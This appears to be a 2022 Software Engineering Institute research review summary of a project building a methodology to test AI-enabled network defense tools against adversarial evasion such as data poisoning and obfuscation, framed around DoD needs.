AI Evaluation Methodology for Defensive Cyber Operator Tools

As AI-powered network defense cyber operations (DCO) tools, or AI-based defenses, become more prevalent and critical to our security, our adversaries are stepping up their efforts to evade detection by these technologies by leveraging adversarial AI techniques, such as data obfuscation and data poisoning [Subedar 2019]. At this time, to our knowledge, no publicly available method exists for thoroughly and methodologically evaluating the capabilities of an AI-enabled DCO tool nor to quantify the degree to which those capabilities remain effective despite adversarial manipulation. The DoD requires an evaluation methodology to practically test the defensive capabilities of an AI defense that is protecting a network.

The objective of this project is to develop a methodology for evaluating the capabilities of an AI defense using publicly available information of defensive network capabilities. Without such a methodology, DoD organizations must either (1) refuse to use AI defenses since they cannot properly test them, (2) apply traditional cybersecurity testing techniques that do not test for AI-specific properties, such as susceptibility to data poisoning, or (3) perform unprincipled ad hoc testing. None of these three options are satisfactory; they can result in the DoD having an unjustified confidence in the quality of their cyber defenses.

The objective of this project is to develop a methodology for evaluating the capabilities of an AI defense.

Shing-hon Lau

Senior Cybersecurity Engineer

The goal of this project is to create a two-part methodology that will

enable the evaluation capabilities of an AI-enabled network DCO tools
enumerate the principles by which the efficacy of an AI-based DCO tool might be reduced when subjected to adversarial evasions

The completed extensible evaluation methodology will

produce a new capability for the DoD—to test and evaluate the defensive capabilities of an AI defense under realistic conditions
represent an increase in the state-of-the-art in broader cybersecurity, as there is not yet a principled methodology for evaluating the defensive capabilities for an AI defense for enterprise networks
allow the DoD to repeatably test AI defenses to examine whether they have the desired defensive benefits, representing an increase in capability
lead to a deeper understanding about detecting and mitigating obfuscations and data poisoning with next-generation DCO tools

2022_ AI Evaluation Methodology for Defensive Cyber Operator Tools

Currently, the project has developed an initial methodology that will permit the DoD to test and evaluate the defensive capabilities of an AI defense under realistic conditions. This methodology is currently undergoing additional refinement and expansion to better increase the information revealed by its application.

In Context

This FY2022–23 project

will allow DoD organizations to assess whether the AI defenses of today or tomorrow would enhance the protections of critical networks
aligns with the CMU SEI technical objective to bring capabilities through software that make new missions possible or improve the likelihood of success of existing ones and to be trustworthy in construction and implementations
aligns with the CMU SEI technical objective to ensure the cadence of acquisition, delivery, and fielding is responsive to and anticipatory of the operational tempo of DoD warfighters and that the DoD is able to field these new software-enabled systems and their upgrades faster than our adversaries
aligns with the DoD software strategy to accelerate the delivery and adoption of AI

Mentioned in this Article

[Subedar 2019]
Subedar, Mahesh; Ahuja, Nilesh; Krishnan, Ranganath; Ndiour, Ibrahima J.; & Tickoo, Omesh. Deep Probabilistic Models to Detect Data Poisoning Attacks. In Fourth Workshop on Bayesian Deep Learning (NeurIPS 2019), Vancouver, Canada. 2019. http://bayesiandeeplearning.org/2019/papers/112.pdf

Software Engineering Institute

Research Review 2022